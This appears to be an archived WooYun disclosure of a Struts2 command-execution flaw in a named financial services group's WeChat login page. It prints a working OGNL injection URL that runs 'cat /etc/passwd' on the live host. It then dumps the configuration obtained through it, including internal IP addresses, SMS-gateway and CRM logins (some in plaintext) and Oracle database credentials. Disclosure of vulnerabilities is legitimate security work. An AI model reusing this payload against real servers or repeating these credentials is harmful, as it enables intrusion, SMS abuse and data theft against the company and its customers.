乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-05-04: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-06-18: 厂商已经主动忽略漏洞,细节向公众公开
某金融服务集团命令执行(可渗透内网,利用短信接口发送短信,劫持微信)
某金融服务集团struts2命令执行(可渗透内网,利用短信接口发送短信,劫持微信)
http://wechat.leadbank.com.cn/loginAction.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%27cat%27,%27/etc/passwd%27})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
ws_client_url=http://10.1.1.247:8088/ld_gateway/services/SmsServicews_client_username=duKAkFMoHco.ws_client_password=6TjUEhoBSQKehpqH8dpdQA..#marketing SMSws_client_marketing_url=http://10.1.1.247:8088/ld_gateway/services/SmsServicews_client_marketing_username=fVe5Ku0KK9I.ws_client_marketing_password=McefExADbZflnVElaHjwrw..#crm ws urlcrm_ws_url=http\://10.1.1.224\:8080/imart/services/WechatService?wsdlcrm_ws_namespace=http\://wechat.webservice.crm.leadbank.com.cncrm_ws_username=ld_wechatcrm_ws_password=Ld_WeChAt
#local jdbc ##########################################################################------------oracle--------------------------jdbc.driverClassName=oracle.jdbc.driver.OracleDriver#for test surroundings LD_WECHART/LD_WECHART#jdbc.url=jdbc:oracle:thin:@10.1.1.249:1521:ORCL#jdbc.username=H3hRomSK8bR_zMG_VVhY7Q..#jdbc.password=H3hRomSK8bR_zMG_VVhY7Q..#for official surroundings LD_WECHAT/LD_WECHAT0923jdbc.url=jdbc:oracle:thin:@10.1.1.97:1521:ORCLjdbc.username=H3hRomSK8bSc3B93RFMddw..#jdbc.password=H3hRomSK8bT0W4spzVOUfw..jdbc.password=v__vHAmJze07AwHSXpV5EA..
工程狮会!
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)